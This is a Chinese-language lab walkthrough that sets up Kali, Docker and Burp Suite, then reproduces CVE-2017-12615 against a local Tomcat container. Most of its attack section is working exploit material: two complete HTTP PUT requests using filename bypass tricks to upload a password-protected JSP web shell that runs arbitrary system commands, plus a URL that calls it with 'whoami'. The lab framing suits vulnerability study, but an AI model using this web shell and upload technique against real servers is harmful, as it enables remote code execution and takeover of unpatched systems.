1 安裝kali系統(tǒng)

1.1 下載VMware壓縮包

kali-linux-2022.1
默認(rèn)的用戶和密碼是kali

1.2 初始化系統(tǒng)

sudo apt update -y  #kali
sudo apt install -y sogoupinyin fcitx
sudo dpkg-reconfigure locales #添加[x] zh_CN.UTF-8 UTF-8
sudo reboot

1.3 安裝docker

vim /etc/apt/sources.list.d/docker.list 
deb [arch=amd64] https://download.docker.com/linux/debian buster stable

sudo apt update -y 
sudo apt install -y docker-ce

1.4 安裝docker-compse

sudo apt install -y docker-compose

2 配置burp代理

2.1 在應(yīng)用程序那里找到burpite
2.2 proxy->options中添加代理
2.3 瀏覽器->添加proxy中寫(xiě)burp開(kāi)啟的代理
2.4 瀏覽器添加burp的證書(shū)

3 配置CVE-2017-12615環(huán)境

sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash  #kali
root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start
#這里暫時(shí)不要關(guān)閉窗口

4 測(cè)試

先用瀏覽器訪問(wèn)

firefox http://127.0.0.1:8080

在brup中找到http proyx中找歷史信息，確認(rèn)代理是否生效
然后打開(kāi)brup的repeater編輯request

PUT /1.jsp::$DATA  HTTP/1.1

Host: 192.168.144.128:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 659



<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
-------------------------------------------------------------------------------------------------------
PUT /2.jsp/ HTTP/1.1

Host: 192.168.144.128:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 664



<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

發(fā)送請(qǐng)求

http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023  #正常就返回系統(tǒng)用戶了